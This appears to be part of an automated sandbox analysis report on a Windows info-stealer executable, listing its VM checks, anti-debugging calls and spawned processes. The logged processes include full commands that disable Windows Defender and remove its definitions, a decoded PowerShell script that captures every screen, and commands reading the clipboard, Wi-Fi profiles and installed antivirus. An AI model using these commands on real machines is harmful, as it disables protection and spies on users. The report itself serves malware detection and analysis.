              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,0_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,1_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFB003229
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF629B146EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF629B0E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B588E0 FindFirstFileExA,65_2_00007FF629B588E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayZ
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer5
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: rar.exe, 00000041.00000003.1894918655.000001ED70C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\`
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1823255495.000001C2C94FF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C9501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: rar.exe, 00000041.00000003.1894918655.000001ED70C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: rar.exe, 00000041.00000003.1894918655.000001ED70C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7zD{
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxserviceZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB7F000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988660753.000002290B8D6000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB7F000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolRSVP
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvcZ
              Source: getmac.exe, 0000002F.00000002.1824184542.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"ME=Co(
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1823255495.000001C2C94FF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C9501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuserZ
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-gaZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWS
              Source: getmac.exe, 0000002F.00000003.1822840760.000001C2C94E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1823255495.000001C2C94FF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000003.1822840760.000001C2C94CC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002F.00000002.1824184542.000001C2C9501000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvcZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretrayZ
              Source: e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer5Z
              Source: e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0042411_2_00007FFDFB004241
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB00572C1_2_00007FFDFB00572C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB0032F6 rdtsc 1_2_00007FFDFB0032F6
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FB1EC44C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB354460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFB354460
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB202790 GetProcessHeap,0_2_00007FF6FB202790
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6FB1EBBC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FB1F9924
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC62C SetUnhandledExceptionFilter,0_2_00007FF6FB1EC62C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6FB1EC44C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6FB1EBBC0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6FB1F9924
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1EC62C SetUnhandledExceptionFilter,1_2_00007FF6FB1EC62C
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFAEE30D8 IsProcessorFeaturePresent,00007FFE126E19A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE126E19A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAEE30D8
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB005A1F IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFB005A1F
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B54C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF629B54C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_00007FF629B4B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4B6D8 SetUnhandledExceptionFilter,65_2_00007FF629B4B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B4A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,65_2_00007FF629B4A66C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
               Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
               Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Users\user\Desktop\e45AiBoV6X.exe "C:\Users\user\Desktop\e45AiBoV6X.exe"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Users\user\Desktop\e45AiBoV6X.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
